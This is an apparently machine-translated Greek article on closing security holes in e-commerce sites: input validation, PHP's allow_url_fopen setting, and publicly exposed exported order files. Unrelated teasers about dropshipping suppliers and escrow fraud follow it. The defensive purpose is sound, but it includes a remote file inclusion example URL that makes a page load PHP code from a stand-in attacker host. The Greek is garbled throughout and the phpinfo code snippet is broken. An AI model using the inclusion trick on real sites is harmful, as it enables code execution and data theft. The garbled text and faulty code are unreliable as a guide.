Ασφάλεια στην ηλεκτρονική ιστοσελίδα εμπόριο πρέπει να είναι μια σημαντική εξέταση κατά την ανάπτυξη ενός e-commerce ιστοσελίδα ή λογισμικού. Ένας προγραμματιστής πρέπει να γνωρίζει όλες τις παραμέτρους ασφάλειας κατά το σχεδιασμό ενός δικτυακού τόπου. Το ηλεκτρονικό εμπόριο όλο και πιο συνηθισμένη αυτές τις ημέρες, ο αριθμός των επιθέσεων ασφαλείας είναι σίγουρα αυξάνεται. Παράνοια είναι ένα υγιές πράγμα για το ηλεκτρονικό εμπόριο δημιουργούς ιστοτόπων, πρέπει να συνεχίσουμε μέχρι την πύλη με θέματα ασφάλειας, και τηρεί τα αυτιά μας και τα μάτια ανοιχτά. Αν και τα ακόλουθα κενά είναι σοβαρά, τα ακόλουθα κενά αν υπάρχει καθορίζονται εύκολα.
Παρακάτω αναφέρονται μερικές εκτιμήσεις ασφαλείας που πρέπει να περιλαμβάνονται κατά την ανάπτυξη ενός τόπου. Αυτό το άρθρο δεν καλύπτει την ηλεκτρονική κλοπή σε μαγαζί, ανατρέξτε ξεχωριστό άρθρο μου σχετικά με αυτό.
Παρέμβαση του χρήστη - κάθε εισόδου, είτε πρόκειται να εισέρχεται σε μια ποσότητα, την αναζήτηση ενός προϊόντος, που εισάγεται σε ένα όνομα κλπ, πρέπει να επικυρωθεί για ύποπτες χαρακτήρες. Εάν αυτό δεν γίνει αυτό, είναι δυνατό να εισέλθει "?>", το κλείσιμο ετικέτες τέλος της PHP και να εκτελέσει κάποια PHP κώδικα.
Είναι πολύ ασφαλέστερο επιτρέπουν αριθμούς και χαρακτήρες az (κεφαλαία περιλαμβάνεται) και 0-9 και μη τι άλλο, αντί να κάνουν μια λίστα με όλα τα χαρακτηριστικά που δεν θα πρέπει να είναι εκεί. Η δέσμη ενεργειών επικύρωσης πρέπει να μετακινηθείτε σε κάθε χαρακτήρα ένα προς ένα. Αυτό πρέπει να επιτευχθεί με τη χρήση για την επικύρωση πλευρά του server, δεν Javascript. Χρήση διακομιστή επικύρωση των εισροών είναι απαραίτητη για να κρατήσουν μακριά τα ανεπιθύμητα χαρακτήρες
Υπάρχει άλλο ένα σημαντικό κατά την εκτέλεση PHP κώδικα. Όταν χρησιμοποιείτε την PHP υπάρχει μια ρύθμιση που ονομάζεται allow_url_fopen που επιτρέπει το άνοιγμα των αρχείων από ένα PHP script. Αυτή η ρύθμιση πρέπει να είναι απενεργοποιημένο, Αν δεν είναι απολύτως απαραίτητο.
Απλά φανταστείτε έχετε PHP scripts για τις δύο σταθερές κεφαλίδες και υποσέλιδα, καθώς και για την πρόσβαση ιστοσελίδες σας θα πρέπει να πληκτρολογήσετε το http://www.mysite.com/index.php?page=page2. Το μόνο που χρειάζεται είναι ένα κακόβουλο χρήστη να εκτελέσετε μια δέσμη ενεργειών με την τροποποίηση των παραμέτρων αυτών με τη δακτυλογράφηση "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" με ορισμένες PHP κώδικας στο αρχείο "hacker.txt". Θα μπορούσατε να έχετε κάτι να συμβεί, PHP αρχεία διαβάσετε, διαγράφεται, ζωτικής σημασίας πληροφορίες κλαπεί.
Αν δεν είστε σίγουροι αν αυτή η ρύθμιση είναι ενεργοποιημένη ή απενεργοποιημένη, παρακαλούμε αντιγράψτε τον παρακάτω κώδικα PHP σε ένα αρχείο κειμένου, και φορτώστε το στο web server σας:
phpinfo ()?
?>
Όταν έχετε πρόσβαση script σας στον διακομιστή σας, θα πρέπει να συναντήσετε τον καθορισμό allow_url_fopen υπό διαμόρφωση.
Ένας χρήστης του υπολογιστή, υπό κανονικές συνθήκες, δεν μπορεί να βρει την τιμή αυτής της ρύθμισης.
Να είστε προσεκτικοί των εξαγόμενων δεδομένων, όπως παραγγελίες, προϊόντα σε CSV και mySQL αρχεία. Εάν αυτά τα δεδομένα που εξάγονται από μια δέσμη ενεργειών και να τηρείται για τον web server σε κοινό, δηλαδή το όνομα του αρχείου. http://www.mysite.com/admin/output_tables.csv. Αυτό είναι πραγματικά μόνο ένα πρόβλημα, όταν τα εξαγόμενα δεδομένα κατοικεί σε ένα αρχείο σε έναν κατάλογο που έχει πρόσβαση το κοινό. Υπάρχουν δύο τρόποι για να αποφευχθεί αυτό το κενό ασφαλείας - Πρώτον έχουν το αρχείο εξόδου προστατεύονται πίσω από έναν κωδικό πρόσβασης καταλόγου, δεύτερον, έχουν τα δεδομένα που βρίσκονται μέσα σε ένα στοιχείο textarea μορφή HTML σε μια δέσμη ενεργειών. Η storeowner στη συνέχεια να αντιγράψετε αυτές τις πληροφορίες από την textfile και να δημιουργήσετε ένα νέο αρχείο στον υπολογιστή τους και να επικολλήσετε τις πληροφορίες εδώ.
Το μόνο που χρειάζεται είναι ένας χάκερ για να βρείτε το όνομα του αρχείου από τον έλεγχο από το e-ιστοσελίδα demo λογισμικό εμπόριο και αναζητήστε το ίδιο όνομα αρχείου σε μια πραγματική τοποθεσία.
Απαριθμούνται κατωτέρω είναι περισσότερα άρθρα που σχετίζονται με το παραπάνω άρθρο από το «ηλεκτρονικό εμπόριο» κατηγορία του.
Οι άνθρωποι που ενδιαφέρονται για το παραπάνω άρθρο «E-Commerce Security - Το κλείσιμο του Ασφάλειας Τρύπες" ενδιαφέρονται επίσης για τα σχετικά άρθρα που αναφέρονται παρακάτω:
Ακριβώς μερικές ημέρες πίσω είχα μια συνομιλία με το φίλο μου. Ήταν 1η γιορτάζει τα γενέθλιά του μωρού και έπρεπε να τρέχουν από τη μητρική του στην Κεράλα και Chennai, το χώρο εργασίας του. Αυτός και η καλύτερη μισο του ταξίδεψαν μεταξύ αυτών των τόπων τουλάχιστον 4 φορές το τελευταίο ένα μήνα.
Εάν έχετε κάνει το ηλεκτρονικό εμπόριο για οποιοδήποτε χρονικό διάστημα, θα έπρεπε να γνωρίζει ότι υπάρχουν περισσότερα από scamers πραγματική τους παρόχους των υπηρεσιών χονδρικής καταλόγου dropship. Στον κόσμο του ηλεκτρονικού επιχειρείν, Salehoo και Worldwide Brands οι δύο αξιόπιστους φορείς παροχής υπηρεσιών που έχουν αποκτήσει δημοτικότητα τα τελευταία χρόνια.
Εάν έχετε ποτέ μια σε απευθείας σύνδεση λιανοπωλητή, πιθανώς να έχετε ήδη ακούσει για Salehoo ή ακόμα και να χρησιμοποιηθούν προς όφελός σας. Αν ξεκινάτε με την επιχείρησή σας, ίσως να συγχέεται με τη μικτή Salehoo σχόλια εκεί έξω. Τώρα, ας ρίξουμε μια ματιά στο τι Salehoo είναι πραγματικά όλα τα σχετικά και τις υπηρεσίες που προσφέρουν την οποία πολλοί έχουν την τάση να παραβλέπουν.
Πόσοι άνθρωποι ξέρετε ότι έχουν αγοραστεί απευθείας κάτι; Αν σας αρέσει εμένα αρκετά, γι 'αυτό το ηλεκτρονικό εμπόριο είναι νέα σε απευθείας σύνδεση εμπορικό κέντρο του κόσμου ψώνια. Αλλά ποιος τρέχει αυτές τις online καταστήματα λιανικής πώλησης; Άνθρωποι όπως εσείς και εγώ, γι 'αυτή την επιχείρηση ανθεί και θα συνεχίσει να άνθησης και τώρα και στο μέλλον.
Εάν είστε ένας τεράστιος ανεμιστήρας της τελευταίας ηλεκτρονικά προϊόντα, ίσως να δελεαστεί από την ιδέα της λειτουργίας του δικού απευθείας σύνδεση επιχείρησή σας ηλεκτρονικά. Δεν είναι ότι σκληρά για να ξεκινήσετε όταν πάρετε την πλήρη αξιοποίηση του δικαιώματος πτώση ναυτιλιακών υπηρεσιών ηλεκτρονικών ειδών και υπάρχουν πολλά για να επιλέξετε.
Μήπως ποτέ πάτε σε τοπικό κατάστημα ευκολία σας και αναρωτιέμαι τι θα ήταν αν ήθελε να ανήκει; Θα είναι μια καλή ιδιοκτήτης, θα τους ανθρώπους σαν εσάς; Λοιπόν αυτό το άρθρο θα σας δείξει τα οφέλη της κυριότητας στη δική online κατάστημα σας, ή κοινώς γνωστό ως ηλεκτρονικό εμπόριο που διαφέρει από ένα πραγματικό τοπικό κατάστημα ευκολία.
Online μεσεγγύησης απάτη γίνεται ανεξέλεγκτες. Η λέξη ασυνείδητοι δεν είναι αρκετά για να περιγράψει αυτούς που επιδιώκουν να κερδίσουν από την δυστυχία των άλλων ή κακή τύχη? Πρέπει να προσθέσουμε λέξεις όπως πονηρούς, δόλιοι, πονηρό, και δεν τουλάχιστον του συνόλου των ανελέητου και σκληρή. Υπάρχουν, ωστόσο, καλοί τρόποι για την καταπολέμησή της. Το οφείλετε στον εαυτό σας να μείνετε ενημερωμένοι σχετικά με αυτό το σημαντικό θέμα.
